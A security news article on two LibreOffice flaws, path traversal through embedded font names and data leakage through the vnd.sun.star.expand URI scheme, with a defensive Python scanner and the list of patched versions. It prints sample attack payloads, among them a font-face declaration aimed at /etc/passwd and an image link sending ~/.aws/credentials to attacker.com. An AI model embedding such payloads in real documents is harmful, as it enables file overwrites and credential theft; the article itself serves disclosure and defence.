
LibreOffice Vulnerabilities Allow Attackers to Write to Files and Extract Data

Two critical vulnerabilities in LibreOffice (CVE-2024-12425 and CVE-2024-12426) expose millions of users to file system manipulation and sensitive data extraction attacks.

These flaws affect both desktop users opening malicious documents and server-side systems using LibreOffice for headless document processing.

CVE-2024-12425: Path Traversal Enables Arbitrary File Writes

The first vulnerability stems from improper path sanitization when handling embedded fonts in OpenDocument XML files.

Attackers can craft documents containing malicious font declarations that escape LibreOffice’s temporary directory through path traversal sequences, as CodeanLabs reports.

The critical code flaw resides in EmbeddedFontsHelper::fileUrlForTemporaryFont, where user-controlled fontName values aren’t sanitized before constructing file paths:

OUString EmbeddedFontsHelper::fileUrlForTemporaryFont(const OUString& fontName) {
    // ... (path is resolved to the user profile directory)
    path += "/user/temp/embeddedfonts/fromdocs/";
    // filename is built from fontName (a suffix and ".ttf" are appended);
    // fontName is never checked for path separators or ".." components
    return path + filename; // fontName contains unsanitized input
}

An attacker could exploit this by embedding a font declaration containing directory traversal sequences:

<style:font-face svg:font-family="../../../../../../../etc/passwd">
  <office:binaryData>SGVsbG8gd29ybGQ...</office:binaryData>
</style:font-face>

This writes the decoded binary data to /etc/passwd0.ttf: the appended .ttf extension constrains the file name, but not the directory the file lands in.

Server-side installations are particularly vulnerable as attackers could overwrite web application files or configuration scripts.

CVE-2024-12426: Variable Expansion Enables Data Exfiltration

The second vulnerability involves LibreOffice’s handling of the vnd.sun.star.expand URI scheme, which supports environment variable substitution and INI file parsing. Attackers can craft documents that leak sensitive information through manipulated URLs:

<img src="vnd.sun.star.expand:http://attacker.com?leak=$HOME/.aws/credentials">

The expansion mechanism supports recursive lookups, enabling complex data extraction chains:

<img src="vnd.sun.star.expand:${file://$HOME/.thunderbird/profiles.ini:Profile0:Path}/...">

This allows reading Thunderbird profiles, SQLite databases, and application secrets stored in environment variables. In one demonstrated attack, hackers could intercept WordPress password reset tokens from email clients by combining multiple expansion steps.
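Both indicators described above (an embedded font name carrying path separators or ".." components, and any attribute value using the vnd.sun.star.expand: scheme) can be checked for before a document reaches LibreOffice. The following Python scanner is an added example and not LibreOffice's or Codean Labs' code; it assumes only that the document is a standard ODF zip container, and the sample document it builds is constructed for the test.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
# Hypothetical scanner (added example, not LibreOffice code): it checks the XML
# parts of an ODF container for the two indicators described above.
EXPAND_SCHEME = "vnd.sun.star.expand:"
ODF_NS = ('xmlns:office="urn:oasis:names:tc:opendocument:xmlns:office:1.0" '
          'xmlns:style="urn:oasis:names:tc:opendocument:xmlns:style:1.0" '
          'xmlns:svg="urn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0" '
          'xmlns:draw="urn:oasis:names:tc:opendocument:xmlns:drawing:1.0" '
          'xmlns:xlink="http://www.w3.org/1999/xlink"')

def _local(name: str) -> str:
    return name.rsplit("}", 1)[-1]  # drop ElementTree's "{namespace}" prefix

def font_name_is_safe(font_name: str) -> bool:
    """Non-empty and free of path separators and '..' (conservative on purpose)."""
    return bool(font_name) and not any(s in font_name for s in ("/", "\\", ".."))

def scan_odf_xml(xml_bytes: bytes, part: str) -> list[str]:
    """Findings for one XML part: unsafe embedded font names and expand: URIs."""
    findings = []
    for elem in ET.fromstring(xml_bytes).iter():
        for attr, value in elem.attrib.items():
            if (_local(elem.tag) == "font-face" and _local(attr) == "font-family"
                    and not font_name_is_safe(value)):
                findings.append(f"{part}: traversal in embedded font name {value!r}")
            if value.lower().startswith(EXPAND_SCHEME):
                findings.append(f"{part}: expand URI in {_local(attr)}: {value!r}")
    return findings

def scan_odf(data: bytes) -> list[str]:
    """Scan every XML part of an ODF container (zip bytes)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return [f for part in zf.namelist() if part.endswith(".xml")
                for f in scan_odf_xml(zf.read(part), part)]

def build_sample(font_family: str, href: str) -> bytes:
    """Constructed minimal ODT-like container, used only to exercise the scanner."""
    content = (f"<office:document-content {ODF_NS}><office:font-face-decls>"
               f'<style:font-face style:name="f" svg:font-family="{font_family}">'
               "<office:binaryData>AAAA</office:binaryData></style:font-face>"
               f'</office:font-face-decls><office:body><draw:image xlink:href="{href}"/>'
               "</office:body></office:document-content>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.text")
        zf.writestr("content.xml", content)
    return buf.getvalue()
```

The scan is deliberately namespace-agnostic so that a document declaring unusual prefixes for the ODF namespaces is still inspected; a clean document yields an empty findings list.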

LibreOffice released patches addressing these vulnerabilities in versions:

  • 7.5.9 (Community)
  • 7.6.5 (Community)
  • 24.2.2 (Enterprise)

These vulnerabilities highlight the risks of complex document processing ecosystems, particularly when combining user-controlled content with legacy file format support.

Enterprises must maintain rigorous patch management cycles for office software components, even in server environments.


Divya

Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.
